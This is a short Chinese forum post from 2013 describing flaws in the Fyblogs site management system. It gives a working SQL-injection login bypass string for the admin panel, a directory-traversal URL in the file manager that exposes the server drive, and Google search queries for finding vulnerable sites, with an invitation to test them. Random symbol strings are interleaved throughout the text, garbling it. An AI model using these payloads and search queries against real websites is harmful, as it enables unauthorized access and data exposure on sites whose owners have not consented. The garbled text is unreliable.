漏洞类型: 未授权访问/权限绕过, M+ S4 p4 J% ]8 }+ s7 U) C
6 Y( W/ X% ~' c1 B4 @+ ^9 D/ a, @
简要描述:& @0 Y; A' ~% x5 y. _/ D
& i2 E& A# P! _0 |( C
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!6 y! m* U" h* f* \
+ ]6 m3 h* X+ l* F# Z- @) ^. `详细说明:3 f' p5 @, \4 b/ z6 [3 D4 Q6 P& m
3 E$ n5 N! G9 y7 ]9 P后台万能密码 'or'='or'
$ D6 V& B/ F, M. e) L5 ?后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
H4 } s/ t" M# n x+ sadmin/uploadfile.asp?currentFolder=/upfiles/../
f$ s1 L A- F% u, v$ F4 |
7 s, y# f' O* Y# ?0 q漏洞证明:
- J/ @& r8 q! ?$ [& ?2 X9 O2 L7 Q% X' C8 p+ y: |# l
谷歌:inurl:type.asp?id=1 新闻中心
. f1 S" S+ Z6 ^或者 :inurl:download_ok.asp?/ u( g, K, R5 r$ W- M
1 s1 F: E. _& R6 U4 U3 H# @可以测试
) Z, |4 s# ^& M" N
2 p: {( U) ?( E. b* x" g2 J# o5 R5 U$ q' c1 e6 k2 ~. q
|
发表于 2013-3-7 13:07:46
收藏
支持
反对